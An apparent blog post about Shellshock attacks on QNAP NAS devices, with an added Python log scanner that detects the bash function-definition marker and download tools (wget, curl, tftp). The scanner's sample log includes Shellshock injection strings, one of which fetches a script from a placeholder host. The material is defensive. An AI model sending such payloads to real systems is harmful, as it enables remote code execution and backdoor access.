QNAP NAS latest bash casualty
The bash Shellshock vulnerability was first published last week. This week has seen both a flurry of patching and/or disabling of services, and the first exploits. Whilst servers are the main target of bash patching, there has been a growing awareness that other systems that use bash (in particular embedded systems) are also potentially vulnerable. This includes VoIP systems and Network Attached Storage devices.
NAS devices are typically used by businesses for storage of large volumes of data, especially when a server is considered unsuitable for the job. In fact, a NAS can often be used in lieu of a server for a small business. Because a NAS is cheap, but still has many functions expected of a server, it is often used by small businesses (including SOHO businesses). Unfortunately, this may mean it is also an attractive target for would-be attackers.
QNAP is one of the largest NAS vendors. As FireEye reports, some of its NAS devices are also being targeted for attack using the Shellshock bug. The attacks have been observed on NAS devices that are open; so far the attacks have been mostly on devices located in Korea and Japan. The attack tries to get the NAS to download a script that first changes the NAS start-up scripts, then copies an SSH key, and finally downloads an ELF binary file. The purpose of downloading the ELF binary is to give the attacker a backdoor for shell access. The FireEye article also contains ways to check whether a QNAP NAS has been hacked in this way.
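A defender-side check for the kind of request described above, added here as an example (it is not from the original post, FireEye or QNAP): it scans web-server access logs for the bash function-definition prefix `() {` that Shellshock input carries and notes whether the same value also calls a download tool. The Combined Log Format, the field names and every sample line, address and path are assumptions constructed for illustration.

```python
import re

# Combined Log Format (assumed): ip ident user [time] "request" status bytes "referer" "agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' (\d{3}) \S+ '
                    + QUOTED + ' ' + QUOTED + r'$')
# Shellshock input starts a value with a bash function definition, "() {".
MARKER_RE = re.compile(r'\(\s*\)\s*\{')
# Download tools, matching the "download a script" step the article describes.
FETCH_RE = re.compile(r'\b(?:wget|curl|tftp)\b')

def scan(lines):
    """Return one finding per log field that carries the function-definition marker."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if m:
            ip, request, status, referer, agent = m.groups()
            fields = {"request": request, "referer": referer, "agent": agent}
        else:
            # Malformed or truncated entries are still searched as a whole.
            ip, status, fields = None, None, {"raw": line}
        for name, value in fields.items():
            if MARKER_RE.search(value):
                findings.append({"line": lineno, "ip": ip, "field": name,
                                 "status": int(status) if status else None,
                                 "fetch": bool(FETCH_RE.search(value))})
    return findings

# Constructed sample log: documentation-range addresses, placeholder paths.
SAMPLE = [
    '203.0.113.5 - - [01/Oct/2014:10:00:01 +0000] "GET /cgi-bin/example.cgi HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Oct/2014:10:00:09 +0000] "GET /cgi-bin/example.cgi HTTP/1.1" '
    '200 0 "-" "() { :; }; /bin/wget http://192.0.2.10/placeholder.sh"',
    '198.51.100.9 - - [01/Oct/2014:10:01:30 +0000] "GET /cgi-bin/example.cgi HTTP/1.1" '
    '404 0 "(){ :;}; echo probe" "-"',
    'truncated entry () { :;}; echo probe',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A hit records an attempt, not a compromise; whether the device was actually changed still has to be confirmed on the NAS itself.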
The penetration of embedded devices running Linux and bash means that further compromises may be possible. The issue with the QNAP Shellshock attack is that an attacker could gain access to the files on the NAS device, making it a potentially dangerous attack. The mitigation strategy (as advised by QNAP) is to install its Malware Remover which will “check your NAS system and remove the backdoor once it is identified”.